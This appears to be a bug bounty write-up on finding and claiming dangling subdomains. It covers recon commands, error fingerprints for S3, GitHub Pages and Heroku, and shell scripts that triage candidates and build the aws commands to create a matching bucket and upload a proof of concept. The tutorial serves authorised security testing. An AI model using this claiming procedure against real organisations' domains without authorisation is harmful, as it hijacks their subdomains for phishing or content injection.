$100-$1000 Worth Subdomain Takeover | Easy Bounty Methodology | by It4chis3c | Apr, 2025 | InfoSec Write-ups



Practical & Step-by-Step guide to find Subdomain Takeover Vulnerability


Hi geeks, it4chis3c (Twitter) came up with another bounty-earning write-up in the Bug Bounty Hunting Series:


Step-by-Step Process

Step 1: Recon

Collect subdomains (add more enumeration tools if you want wider coverage; anew de-duplicates as you append):

subfinder -d example.com -silent | anew subs.txt
amass enum -passive -d example.com | anew subs.txt

The main error fingerprints to look for in the HTTP response when you visit a subdomain:

AWS S3: NoSuchBucket error in response.

GitHub Pages: 404 There isn't a GitHub Pages site here.

Heroku: No such app error.

cat subs.txt | dnsx -cname -resp | grep -iE 's3|github|heroku' > cnames.txt  

Step 2: Are all errors really exploitable?

Here’s how I filter:

  1. Check for “dangling” CNAMEs:

If dev.example.com → dev-example.herokuapp.com but Heroku says "No such app", that is a takeover candidate: the DNS record still points at a resource nobody owns.

Visit the CNAME target directly (e.g., dev-example.herokuapp.com). If it's dead, you can claim it, provided the provider still lets anyone register that exact name (or, when the target domain itself no longer resolves, the domain is registrable).

2. Avoid False Positives:

Some services show 404s but aren’t claimable (e.g., Shopify). Use can-i-take-over-xyz to check.
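To show Steps 1 and 2 end to end, here is an added example (my own script, not code from the original write-up): it takes host/CNAME-target pairs plus the HTTP body fetched from each host and sorts them into candidates, known false positives, dangling targets and live hosts, using the three fingerprints named above and the article's Shopify example. Everything it consumes is constructed inline; in real use the host/target pairs come from dnsx -cname -resp and the body from curl. The provider table, the verdict names and the dnsx line format are my assumptions.

```shell
#!/bin/sh
# Added example, not from the write-up: turn "host target" pairs plus each
# host's HTTP body into a takeover triage verdict, using the article's
# fingerprints (S3 NoSuchBucket, GitHub Pages 404 text, Heroku "No such app")
# and treating Shopify as the known false positive it mentions.
# ALL sample data below is constructed; real input would come from
#   dnsx -cname -resp   (host and target)  and  curl -s "https://$host"  (body).

# provider_for TARGET: map a CNAME target to the provider behind it
provider_for() {
  case "$1" in
    *.s3.amazonaws.com|*.s3-website*.amazonaws.com|*.s3.*.amazonaws.com) echo s3 ;;
    *.github.io)     echo github ;;
    *.herokuapp.com) echo heroku ;;
    *.myshopify.com) echo shopify ;;
    *)               echo unknown ;;
  esac
}

# verdict PROVIDER DNS_STATUS BODY
#   candidate      fingerprint of an unclaimed resource on a claimable service
#   not-claimable  error page from a provider that will not let you register the name
#   dangling       target no longer resolves (NXDOMAIN): check whether the domain is registrable
#   alive          resource exists, nothing to do
#   unknown        provider not in the table: check can-i-take-over-xyz by hand
verdict() {
  provider="$1"; dns="$2"; body="$3"
  if [ "$dns" = NXDOMAIN ]; then echo dangling; return 0; fi
  case "$provider" in
    s3)      case "$body" in *NoSuchBucket*) echo candidate ;; *) echo alive ;; esac ;;
    github)  case "$body" in *"There isn't a GitHub Pages site here"*) echo candidate ;; *) echo alive ;; esac ;;
    heroku)  case "$body" in *"No such app"*) echo candidate ;; *) echo alive ;; esac ;;
    shopify) echo not-claimable ;;   # 404s, but the shop name cannot be claimed (article's example)
    *)       echo unknown ;;
  esac
}

# triage HOST TARGET DNS_STATUS BODY: one tab-separated result line
triage() {
  p=$(provider_for "$2")
  printf '%s\t%s\t%s\t%s\n' "$1" "$2" "$p" "$(verdict "$p" "$3" "$4")"
}

# Constructed sample set: the three fingerprints, a Shopify false positive,
# a live GitHub Pages site and a CNAME whose target no longer resolves.
triage files.example.com files.example.com.s3.amazonaws.com NOERROR \
  '<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message></Error>'
triage docs.example.com example-org.github.io NOERROR \
  "<h1>404</h1><p>There isn't a GitHub Pages site here.</p>"
triage dev.example.com dev-example.herokuapp.com NOERROR \
  '<title>No such app</title>'
triage shop.example.com example-shop.myshopify.com NOERROR \
  'Sorry, this shop is currently unavailable.'
triage www.example.com example-org.github.io NOERROR '<html>welcome</html>'
triage old.example.com old-vendor.example.net NXDOMAIN ''
```

Only a "candidate" line is worth taking to Step 3, and even then the provider's entry in can-i-take-over-xyz decides whether the name is actually registrable; the table here covers only the four providers the article names, so extend it per program.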

Step 3: Claiming the Subdomain

Let's use AWS S3 as the example:

  1. Find an interesting CNAME: files.example.com → files.example.com.s3.amazonaws.com. The bucket name is the part before .s3 (here files.example.com), and it must match exactly.
  2. Check if the bucket exists:
aws s3 ls s3://files.example.com

If you see NoSuchBucket, the name is unclaimed: proceed. An AccessDenied error or an object listing means the bucket exists and belongs to someone, so there is nothing to take over.

3. Create the bucket and upload a PoC:

aws s3 mb s3://files.example.com …
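The claim only works if the bucket is created under the exact name and, for regional or static-website endpoints, in the region the CNAME target encodes. The following is an added example (my own, not the author's) that derives both from the target and prints the aws commands it would run; it only executes them when the DO_CLAIM=1 environment variable is set, so it is safe to run as-is. The endpoint patterns are the ones I know AWS uses (bucket.s3.amazonaws.com, bucket.s3.REGION.amazonaws.com, bucket.s3-website-REGION or bucket.s3-website.REGION.amazonaws.com); poc.html and DO_CLAIM are hypothetical names.

```shell
#!/bin/sh
# Added example, not from the write-up: derive the exact bucket name and the
# region from an S3 CNAME target before claiming it. Commands are printed and
# only run when DO_CLAIM=1 is set. Endpoint forms below are assumptions from
# AWS's documented virtual-hosted and website endpoint formats.

# s3_bucket TARGET: the labels before ".s3" / ".s3-website"; fails if not an S3 endpoint
s3_bucket() {
  case "$1" in
    *.s3-website-*.amazonaws.com|*.s3-website.*.amazonaws.com) echo "${1%.s3-website[-.]*}" ;;
    *.s3.amazonaws.com|*.s3.*.amazonaws.com|*.s3-*.amazonaws.com) echo "${1%.s3[.-]*}" ;;
    *) return 1 ;;
  esac
}

# s3_region TARGET: region encoded in the endpoint. The legacy global endpoint
# (bucket.s3.amazonaws.com) is reported as us-east-1, the region it was built for.
s3_region() {
  b=$(s3_bucket "$1") || return 1
  rest=${1#"$b".}                      # e.g. s3.eu-west-1.amazonaws.com
  case "$rest" in
    s3.amazonaws.com)            echo us-east-1 ;;
    s3-website-*.amazonaws.com)  r=${rest#s3-website-}; echo "${r%.amazonaws.com}" ;;
    s3-website.*.amazonaws.com)  r=${rest#s3-website.}; echo "${r%.amazonaws.com}" ;;
    s3.*.amazonaws.com)          r=${rest#s3.};         echo "${r%.amazonaws.com}" ;;
    s3-*.amazonaws.com)          r=${rest#s3-};         echo "${r%.amazonaws.com}" ;;
    *) return 1 ;;
  esac
}

# run CMD: print the command; execute it only when DO_CLAIM=1 (hypothetical switch)
run() { echo "$1"; if [ "${DO_CLAIM:-0}" = 1 ]; then $1; fi; }

# claim_plan TARGET: the Step 3 commands with the right name and region filled in
claim_plan() {
  b=$(s3_bucket "$1") || { echo "not an S3 endpoint: $1" >&2; return 1; }
  r=$(s3_region "$1")
  run "aws s3 mb s3://$b --region $r"
  run "aws s3 cp poc.html s3://$b/index.html --region $r"
  # only a website endpoint needs static hosting switched on
  case "$1" in *.s3-website*) run "aws s3 website s3://$b --index-document index.html" ;; esac
}

# Constructed targets: the article's CNAME, a regional one and a website endpoint
claim_plan files.example.com.s3.amazonaws.com
claim_plan assets.example.com.s3.eu-west-1.amazonaws.com
claim_plan static.example.com.s3-website-us-west-2.amazonaws.com
```

Two things to remember when you do run it: new buckets have S3 Block Public Access enabled by default, so the PoC object is not reachable until you relax that and attach a bucket policy granting s3:GetObject; and a bucket served through the plain s3.amazonaws.com endpoint delivers the object directly, whereas an s3-website endpoint returns nothing until static website hosting is enabled.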
